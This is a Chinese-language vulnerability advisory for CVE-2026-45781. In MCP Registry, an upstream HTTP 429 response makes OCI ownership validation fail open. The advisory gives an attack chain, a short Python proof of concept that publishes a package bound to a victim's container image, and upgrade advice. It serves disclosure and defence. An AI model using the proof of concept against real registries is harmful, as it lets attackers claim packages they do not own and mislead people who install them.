CVE-2026-45781 CVSS 3.5 低危

CVE-2026-45781 MCP Registry所有权验证绕过漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-45781

漏洞类型

权限验证绕过

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

MCP Registry

漏洞概述

MCP Registry在1.7.9之前版本存在权限验证绕过漏洞。当上游OCI注册表因速率限制返回HTTP 429时，验证逻辑会跳过标签匹配检查。这允许任何已认证发布者将不控制的OCI镜像绑定到自己的命名空间，导致所有权验证失效。

技术细节

该漏洞位于`internal/validators/registries/oci.go:104-119`，核心在于OCI所有权验证的错误处理逻辑不严谨。在正常流程中，系统需检查上游OCI镜像的`io.modelcontextprotocol.server.name`标签以确认发布者对镜像的控制权。然而，当注册表以匿名方式向上游发起请求时，若遭遇HTTP 429（Too Many Requests）速率限制，`ValidateOCI`函数会直接返回nil（成功），从而绕过了位于122-141行的标签匹配检查。这种“失败开放”的设计缺陷与NPM、PyPI等其他注册表类型将非200状态视为硬错误的处理方式截然不同，使得攻击者可以通过触发上游速率限制来伪造包所有权绑定。

攻击链分析

STEP 1

步骤1

攻击者注册一个合法的MCP Registry发布者账号，获得认证身份。

STEP 2

步骤2

攻击者准备一个发布请求，试图将自己命名空间下的包名绑定到一个由受害者控制的OCI镜像（如 ghcr.io/victim/image）。

STEP 3

步骤3

MCP Registry接收请求后，尝试向上游OCI注册表匿名发起请求以验证标签。

STEP 4

步骤4

上游OCI注册表因请求频繁或其他原因返回HTTP 429（Too Many Requests）状态码。

STEP 5

步骤5

MCP Registry的验证逻辑错误地将429视为成功，跳过了标签匹配检查。

STEP 6

步骤6

发布操作被接受，攻击者成功将不属于自己的镜像绑定到自己的命名空间。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual PoC for CVE-2026-45781
# This script demonstrates the logic where a rate limit (429) leads to a bypass.
# In a real scenario, the attacker would flood the upstream registry or rely on existing limits.

def publish_mcp_package(target_registry, namespace, malicious_image_uri):
    """
    Simulates publishing a package to MCP Registry.
    """
    payload = {
        "name": f"{namespace}/malicious-package",
        "oci_image": malicious_image_uri,
        "publisher_token": "attacker_auth_token"
    }
    
    # The MCP Registry attempts to validate the OCI image upstream.
    # If upstream returns 429, the vulnerable version accepts the publish.
    response = requests.post(f"{target_registry}/api/publish", json=payload)
    
    if response.status_code == 200:
        print("[+] Package published successfully (Validation Bypassed)")
    else:
        print("[-] Package publish failed")

# Usage
# publish_mcp_package("http://mcp-registry.com", "io.github.attacker", "ghcr.io/victim/legit-image:latest")

影响范围

MCP Registry < 1.7.9

防御指南

临时缓解措施

建议立即将MCP Registry升级至1.7.9或更高版本以修复该漏洞。如果无法立即升级，应限制新发布者的权限，并手动审查所有新发布的OCI镜像绑定请求，确保发布者确实拥有对应镜像的控制权。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表